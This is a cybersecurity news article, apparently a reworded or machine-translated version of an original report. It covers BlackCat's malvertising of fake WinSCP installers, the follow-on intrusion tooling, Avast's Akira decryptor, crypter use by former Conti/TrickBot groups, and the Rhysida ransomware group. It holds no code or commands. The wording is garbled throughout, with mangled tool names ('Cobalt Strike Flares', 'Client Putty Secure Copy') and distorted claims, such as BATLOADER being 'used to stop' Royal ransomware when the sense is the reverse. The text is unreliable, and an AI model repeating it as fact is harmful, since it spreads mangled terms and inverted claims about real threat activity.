BlackCat Operator Distributes Ransomware Disguised as WinSCP via Malvertising
Threat actors associated with the BlackCat ransomware have been observed using malvertising tricks to distribute rogue installers of the WinSCP file transfer application.
“Bad actors use malvertising to distribute malware through cloned web pages from legitimate organizations,” Trend Micro researcher said in an analysis published last week. “In this case, the distribution involves a web page of the well-known application WinSCP, an open source Windows application for file transfer.”
Malvertising refer for use SEO poisoning techniques to spread malware through online advertising. This usually involves hijacking a selected set of keywords to display fake ads on Bing and Google search results pages with the goal of redirecting unsuspecting users to cryptic pages.
The idea is to trick users looking for applications like WinSCP into downloading malware, in this case, a back door that contains a Cobalt Strike Flares which connects to a remote server for subsequent operations, while also using legitimate tools such as AdFind to facilitate network discovery.
The access provided by Cobalt Strike is then abused to download a number of programs for reconnaissance, enumeration (PowerView), lateral movement (PsExec), bypassing antivirus software (KillAV BAT), and extracting customer data (Client Putty Secure Copy). Also observed is usage Terminators a defense evasion tool to tamper with security software via a Bring Your Own Vulnerable Driver (BYOVD) attack.
In a chain of attacks detailed by the cybersecurity firm, the threat actor managed to steal top-level administrator privileges to perform post-exploit activities and attempt to set up persistence using remote monitoring and management tools such as AnyDesk as well as access backup servers.
“It is very likely that the enterprise would be substantially affected by the attack if it intervened later, especially since the threat actor has managed to gain early access to domain administrator privileges and started building backdoors and persistence,” said Trend Micro.
This development is just the latest example of threat actors leveraging the Google Ads platform to spread malware. In November 2022, Microsoft disclosed an attack campaign that leveraged an advertising service to implement BATLOADER, which was then used to stop Royal ransomware.
It also comes as Czech cybersecurity company Avast released a free decryptor for the fledgling Akira ransomware to help victims recover their data without having to pay carriers. Akira, who first appeared in March 2023, since then expanding its target footprint to enter the Linux system.
“Akira has some similarities to the Conti v2 ransomware, which may indicate that the malware authors were at least inspired by the leaked Conti source,” said the Avast researcher. The company did not disclose how it cracked the ransomware’s encryption algorithm.
The Conti/TrickBot Syndicate, aka Gold Ulrick or ITG23, shut down in May 2022 after experiencing a series of disturbing events triggered by the start of Russia’s invasion of Ukraine. But e-crime groups continue to exist today, albeit as smaller entities and use crypters and shared infrastructure to distribute their warez.
IBM Security X-Force, in a recent deep dive, said gang crypters, which are applications designed to encrypt and obfuscate malware to evade detection by antivirus scanners and hinder analysis, are also being used to spread new types of malware such as Aresloader, Canyon, CargoBay, DICELOADER, Lumma C2, Matanbuchus, Minodo (formerly Domino), Pikabot, SVCReady, Vidar.
“Previously, crypters were used primarily with core malware families related to ITG23 and their close partners,” security researchers Charlotte Hammond and Ole Villadsen said. “However, the cracking of ITG23 and the emergence of new factions, relationships and methods, have impacted the way crypters are used.”
Despite the dynamic nature of the cybercrime ecosystem, as cybercriminals come and go, and multiple operations partner together, shut down, or rebrand their financially motivated schemes, ransomware continues to be a constant threat.
This includes the emergence of a new ransomware-as-a-service (RaaS) group called Rhysida, which primarily targets the education, government, manufacturing, and technology sectors across Western Europe, North and South America, and Australia.
“Rhysida is a 64-bit Windows Portable Executable (PE) cryptographic ransomware application compiled using MINGW/GCC,” SentinelOne said in technical writing. “In each sample analyzed, the application program name was set to Rhysida-0.1, indicating that the tool is in an early stage of development.”
